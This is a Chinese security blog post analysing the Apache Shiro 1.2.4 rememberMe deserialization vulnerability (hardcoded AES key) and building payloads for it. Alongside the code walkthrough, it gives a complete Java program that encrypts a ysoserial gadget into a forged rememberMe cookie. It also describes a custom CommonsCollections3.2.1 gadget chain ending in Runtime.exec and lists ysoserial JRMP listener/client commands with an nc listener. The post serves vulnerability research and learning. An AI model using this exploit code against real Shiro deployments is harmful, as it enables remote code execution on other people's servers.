

Hu3sky's blog

shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造

Hu3sky's blog

shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造

Word count: 2,088 / Reading time: 9 min

 2020/01/06   Share

• 
• 
• 
• 
• 

前言

最近学了基于ysoserial工具的Commons-Collections3和4的几条反序列化攻击链，因为shiro-1.2.4的默认示例也是自带Commons-Collections3.2.1的包的，虽然是个老洞了，不过结合自己刚学的东西，来分析并研究一下这个洞，希望有所收获。

漏洞预警

https://issues.apache.org/jira/browse/SHIRO-550

漏洞详情

默认情况下，shiro使用CookieRememberMeManager，这将对用户身份进行序列化，加密和编码，以供以后检索，因此当其接收到一个用户的验证请求时，会做如下操作：

• 检索RememberMe cookie 的值
• Base 64解码
• 使用AES解密
• 使用Java序列化（ObjectInputStream）反序列化。

但是，默认加密密钥是硬编码的，这意味着有权访问源代码的任何人都知道默认加密密钥是什么。因此，攻击者可以创建一个恶意对象，对其进行序列化，编码，然后将其作为cookie发送

影响范围

<1.2.4

漏洞分析

环境搭建

jdk版本要求：jdk1.6，对应的mvn，对应的tomcat也要重新下载（tomcat7）

https://github.com/apache/shiro
git checkout shiro-root-1.2.4

修改pom.xml

<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>jstl</artifactId>
    <!--  这里需要将jstl设置为1.2 -->
    <version>1.2</version>
    <scope>runtime</scope>
</dependency>

修改sapmles/web下的pom.xml

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

cd samples/web
sudo mvn package

将war放置tomcat的webapp下，搭建好的环境如下

前置知识

shiro的权限操作是委托给securityManager的，而securityManager管理session又是委托给sessionManager的，而在开发web项目中，我们一般会使用
org.apache.shiro.web.mgt.DefaultWebSecurityManager
DefaultSecurityManager是shiro自带实现的最基础但已直接可用的SecurityManager，它包含了shiro所有主要的鉴权流程

对一个cookie的处理流程是

1. 先将凭证序列化
2. Aes加密
3. 前端显示的时候进行一次base64加密

代码分析

根据官方提供的漏洞描述，漏洞的触发大致是

• 检索RememberMe cookie 的值
• Base 64解码
• 使用AES解密
• 使用Java序列化（ObjectInputStream）反序列化。

我们通过默认给出的账号进行登录，勾选remember me，就会获得一个cookie值

09wFAt1bkYIMrGEa63+y/JGKGMULMejMG+Y8XolYgOAb+Yp/TZV6CfNlnyC2Xwj0z325KTOh3/q0z/zWbcQ8yE9poCAzJAjf/lsnAB+4gHz3pOfu1sn2jztFw9wtGNa8FItnX8XCK6+u88g9VsNIZaT78IhkkJjir43nUosJbhcOZNHfeCXRikGjb50/SePK57tggDeyePrEl0Zx0Cc2XwYzFVEWxAktIXDElOZSA2elo6vNWqGn93/2BsOkpEI7hwT5272Y/Z9suoR6ipcMbo8p54uNyaF4LUak/XOj+eca1QQLXculVTSDe5IwocnVqDCmAv9HYutCpAJwNmNp1bdCIFHWcj8/8ERbcaOnddYfH2QYQlAZyUMWnDWkiJ5ogQb9hN6k7TiWiyq+YZPk86Vf22YePMorEfdFG+Sf9cg4YKN+Ik67CtjF0f2lXNFv85KQ+lmLVnIn9eCL06fbXrUZOLeaRspfug1NlK1nT1uveQx+YXXkpKbkt5BnGBPQ

先来看看他生成这段cookie的过程

序列化数据

我们从AuthenticatingFilter开始跟进，前面是路由反派到认证过滤器这里的过程

这里的createToken返回登录表单的请求结果，并保存在token里

然后跟进subject.login，继续跟入securityManager.login，securityManager是DefaultWebSecurityManager，
认证成功后，进入onSuccessfulLogin

info里存储着用户的登录信息，token里有rememberMe的布尔值

首先获取当前rememberMeManager，为CookieRememberMeManager，而CookieRememberMeManager继承于AbstractRememberMeManager，所以实际是调用了AbstractRememberMeManager

然后跟进AbstractRememberMeManager.onSuccessfulLogin

判断是否有rememberme选项，有就进入rememberIdentity

然后返回身份集合PrincipalCollection，作为参数传入rememberIdentity
然后调用convertPrincipalsToBytes，对身份集合进行处理，我们跟入看看

在convertPrincipalsToBytes里调用了serialize进行序列化处理，接着再调用encrypt方法

先获取加密的Server，默认是AES加密


能够在AbstractRememberMeManager看到密钥

加密的时候将密钥的byte数组(16位)和序列化之后的数组一起传入JcaCipherService.encrypt进行加密，
利用arraycopy()方法将随机的16字节IV放到序列化后的数据前面，完成后再进行AES加密

加密完后返回加密结果

进入rememberSerializedIdentity方法

在里面完成了base64的加密

到这里整个cookie的处理就算完成了

反序列化数据

从createSubject开始跟进

从context上下文中去解析

由于context中的principals为null，于是调用DefaultSecurityManager的getRememberedIdentity方法去从rememberMe中获取

首先获取RememberMeManager为CookieRememberMeManager

然后调用getRememberedPrincipals，由于CookieRememberMeManager没有该方法，于是到他的父类AbstractRememberMeManager里去调用

获取rememberMe值并调用getRememberedSerializedIdentity进行base64解密

如果从当前cookie里获取到了rememberMe的cookie值，那么就调用convertBytesToPrincipals
获取到当前的Server为Aes，进入decrypt

之后的过程跟加密相反，先去掉随机的16字节，再进行Aes解密
解密完之后，就会调用deserialize进行反序列化

构造payload

CommonsCollections4:4.0

因为手动添加了Commons-Collections-4.0的依赖包，所以可以直接用他的一个通用利用链，详细参考yso的Commons-Collections-4.0的gadgets，就不细说了
构造起来，总的来说还算简单，不过有几个点比较坑，我是通过反射去直接获取org.apache.shiro.mgt.AbstractRememberMeManager这个抽象类的encrypt方法，不过中间花了点时间，因为之前没遇到过反射抽象类的情况，解决方法是自己写一个类，继承这个抽象类，然后重写他的抽象方法，于是我的payload构造完后为这个样子

package com.hu3sky.test;

import org.apache.shiro.codec.Base64;
import org.apache.shiro.mgt.AbstractRememberMeManager;
import org.apache.shiro.subject.Subject;
import org.apache.shiro.subject.SubjectContext;

import java.io.BufferedInputStream;
import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;
import java.lang.reflect.Method;

public class Payload {
    public static void main(String[] args) throws Exception {
        BufferedInputStream in = new BufferedInputStream(new FileInputStream("/Users/hu3sky/Penetration tools/exp/ysoserial/commonscollections2.ser"));
        ByteArrayOutputStream out = new ByteArrayOutputStream(1024);

        System.out.println("Available bytes:" + in.available());

        byte[] temp = new byte[1024];
        int size = 0;
        while ((size = in.read(temp)) != -1) {
            out.write(temp, 0, size);
        }
        in.close();
        //将序列化内容加载到数组中
        byte[] content = out.toByteArray();

        class A extends AbstractRememberMeManager{
            @Override
            protected void forgetIdentity(Subject subject) {
            }
            @Override
            protected void rememberSerializedIdentity(Subject subject, byte[] serialized) {
            }
            @Override
            protected byte[] getRememberedSerializedIdentity(SubjectContext subjectContext) {
                return new byte[0];
            }
            @Override
            public void forgetIdentity(SubjectContext subjectContext) {
            }
        }
        //将序列化数组做处理，aes加密，base64加密
        //获取encrypt方法
        Method method = AbstractRememberMeManager.class.getDeclaredMethod("encrypt", byte[].class);
        method.setAccessible(true);
        byte[] bytes = (byte[]) method.invoke(new A(),new Object[]{content});
        String base64 = Base64.encodeToString(bytes);
        System.out.println(base64);
    }
}

将生产的cookie带到rememberMe，发包

这样就能直接弹出计算器

CommonsCollections3:3.2.1

yso自带的利用链失效

刚才4.0版本是我们手动添加的，现在我们直接利用他自带的3.2.1版本
我们利用yso的第一条链

运行到deserialize到时候报错了

java.lang.ClassNotFoundException: Unable to load ObjectStreamClass [[Lorg.apache.commons.collections.Transformer;: static final long serialVersionUID = -4803604734341277543L;]:

那我们直接在本地利用呢

成功触发了，但是为什么shiro上面没法触发呢
查找了些资料后发现，shiro自己实现的类加载器是无法对任何数组进行反序列化的（yso针对3.1中基本用的都是数组，也就是ChainedTransformer，InvokerTransformer不能用）

寻找3.2.1下不需要数组的gadgets

目前的yso利用方式就两种，一种是InvokerTrasnformer的反射，一种是利用TemplatesImpl的defineClass加载字节码，不用到数组，那么只能用第二种方法，加载字节码

本来以为能用第二条链，结果发现在3.2.1版本下的TransformingComparator并没有实现Serializable接口，不能被反序列化，这就需要我们重新去找一个能触发，最终要调用到TemplatesImple.newTransformer，还要用transform方法来触发，现在我们去找哪些地方调用了transform
由于已经没有其他ComparableComparator再调用transform了，所以我们不能用PriorityQueue来触发了
花了一点时间，通过组合，我构造出了一条在3.2.1不需要数组的链，我将它称为CommonsCollections8

调用栈

Gadget chain:
	ObjectInputStream.readObject()
		BadAttributeValueExpException.readObject()
               TiedMapEntry.toString()
                   LazyMap.get()
					InvokerTransformer.transform()
						Method.invoke()
							Runtime.exec()

JRMP

或者利用JRMP(JRMP不依赖于本地的包，所以该方法比较好用)

java -cp ./target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1234 CommonsCollections8 "curl 127.0.0.1:4444"

java -jar ./target/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "127.0.0.1:1234" > CommonsCollections8.ser

nc -lv 4444

1.2.5fix

如果没有配置密钥，那么会自动生成一个密钥，不过密钥泄漏还是会引发同样的问题

Reference

• https://cloud.pingan.com/ssr/notice/894?subType=security
• https://issues.apache.org/jira/browse/SHIRO-550
• https://iter01.com/422189.html
• http://cn.voidcc.com/question/p-kxctncfy-nd.html
• http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html
• https://bling.kapsi.fi/blog/jvm-deserialization-broken-classldr.html
• https://blog.zsxsoft.com/post/35

原文作者: Hu3sky

原文链接: http://yoursite.com/2020/01/06/shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造/

发表日期: January 6th 2020, 10:01:00 am

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  JMX-RMI
• Previous Post
  CVE-2018-1270 Remote Code Execution with spring-messaging 分析

Powered by Hexotheme Archer

本站总访问量次

本站总访问量: :)

CATALOG

1. 1. 前言
2. 2. 漏洞预警
3. 3. 漏洞详情
4. 4. 影响范围
5. 5. 漏洞分析
   1. 5.1. 环境搭建
   2. 5.2. 前置知识
   3. 5.3. 代码分析
   4. 5.4. 序列化数据
   5. 5.5. 反序列化数据
6. 6. 构造payload
   1. 6.1. CommonsCollections4:4.0
   2. 6.2. CommonsCollections3:3.2.1
      1. 6.2.1. yso自带的利用链失效
      2. 6.2.2. 寻找3.2.1下不需要数组的gadgets
      3. 6.2.3. JRMP
7. 7. 1.2.5fix
8. 8. Reference



• Archive
• Tag
• Cate

Total : 101

2021

• 01/22Oracle补丁日 ：CVE-2020-14756 漏洞利用及补丁分析
• 01/18CVE-2020-17518/17519：Apache Flink 目录遍历漏洞&路由分析
• 01/042020 总结 & 2021 计划

2020

• 12/11浅析 S2-061
• 10/19Websphere 最新版9.0.5.5 反序列化入口挖掘以及XXE构造
• 04/19Orcale 4月补丁日的几个漏洞以及CVE-2020-2801的简单分析
• 04/08CVE-2020-10204/CVE-2020-10199 Nexus Repository Manager3 分析&以及三个类的回显构造
• 03/20weblogic t3 协议利用与防御
• 03/08CVE-2020-2555 漏洞分析
• 03/06JMX-RMI
• 01/06shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造

2019

• 12/20CVE-2018-1270 Remote Code Execution with spring-messaging 分析
• 10/20Joomla 3.4.6 远程代码执行
• 10/16WebLogic-XMLDecoder反序列化分析
• 10/05Fastjson反序列化漏洞以及多版本补丁分析
• 10/02JAVA XXE
• 09/24Thinkphp多个版本注入分析
• 09/20Thinkphp3个版本数据库操作以及底层代码分析
• 09/13java反序列化由浅入深及JNDI注入理解(二)-JAVA Apache-Commons-Collections
• 09/10Ciscn华北赛区Dropbox题解
• 09/08java反序列化由浅入深及JNDI注入理解(一)-Spring反序列化
• 09/062019护网杯esaypy
• 09/04php-fpm&fast-cgi学习
• 08/24java安全漏洞入门之 s2-001
• 08/24java安全漏洞入门之 s2-003&s2-005
• 08/21.user.ini后门
• 08/15laravel5.7-unserialize-RCE
• 08/08De1CTF Ssrfme 详解
• 08/06深入理解浏览器编码
• 05/13bypassUAC_via_comhijacking
• 05/07JavaScript Prototype 污染攻击之 Code-Breaking-TheJS篇
• 05/06JavaScript Prototype 污染攻击之 基础篇
• 04/24内网中的PowerSploit
• 04/23第12届全国大学生信息安全竞赛Web题解
• 04/22DDCTF部分 Write up
• 04/21How To Use Cobalt Strike(备忘录)
• 04/02Content Security Policy&Bypass
• 04/01跨域相关问题
• 03/27Windows安全下的一些网络认证
• 03/21三层内网搭建&MSF正反向代理穿透
• 02/28WordPress5.0 RCE 分析
• 02/22About OAuth2.0
• 02/20Metinfo 6.1.2 SqlInjection
• 02/16初识Redis未授权访问
• 02/15nullcon ctf 部分web
• 02/1435c3-POST 学习
• 02/11Pwnhub Pink friend 学习
• 02/09LCTF-babyphp's revenge
• 02/07HCTF2018 部分Web
• 01/31从两道CTF实例看python格式化字符串漏洞
• 01/29DiscuzX 3.4 前台SSRF
• 01/28齐博CMSv7审计
• 01/28从SCTF看nginx配置问题
• 01/23Code-Breaking Puzzles
• 01/210ctf-ezdoor
• 01/18Tp5.0.0-5.0.23 RCE学习
• 01/11Thinkphp5.* getshell 分析
• 01/11PHPCMS2008_getshell
• 01/0735C3 CTF 部分解题记录（junior）

2018

• 12/25SWPUCTF_WP
• 12/23寒假学习计划
• 10/06destoon前台getshell复现
• 09/12YXCMS 1.4.7
• 09/12YXCMS 1.4.7 - Arbitrary file deletion
• 09/07反序列化之phar://学习
• 09/06ssh后门
• 09/03Git
• 09/01python装饰器
• 08/30hackme CTF 记录
• 08/25php-security-calendar-2017
• 08/25eyoucms前台getshell复现
• 08/23Hooskcms 几个小洞
• 08/18Hack the ch4inrulz of Vulnhub
• 08/18Bugku sql注入2
• 08/07Vulnhub\|Cyberry靶机
• 07/17java学习笔记
• 07/05暑假学习计划
• 07/03Bob 1.0.1
• 06/29浅谈XML实体注入漏洞
• 06/22Vulnhub Bsides靶机
• 06/11Linux
• 06/06超级玛丽靶机渗透测试笔记
• 06/04jarvisoj WP
• 05/25域渗透练习
• 05/23Empire使用总结
• 05/09ctf一道题目。php反序列化学习
• 05/03记一次kali渗透测试靶机
• 04/25[Untitled Post]
• 04/24i春秋WP
• 04/24实验吧WP
• 04/20scrapy爬虫实例
• 04/17webug wp
• 04/15线下赛总结
• 04/101个月学习计划
• 04/10Scrapy笔记
• 04/01rnpnet tiki-calendar.php页面存在代码执行漏洞
• 03/28cookie与session的笔记
• 03/23VehicleWorkshop上传漏洞本地复现
• 03/16Redtiger题目
• 03/15会员日Pwnhub题目的复现
• 01/13Flask_SSTI



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

CTF writeup 规划 学习计划 渗透测试 浏览器安全 java安全 漏洞分析 备忘录 代码审计 write-up 学习笔记 Linux Arbitrary-File-Upload CVE-Request sql注入 http协议 内网渗透 Empire git php反序列化 JavaScript python scrapy php魔法 xxe 代码执行 内网 后门 线下赛 前端 域渗透

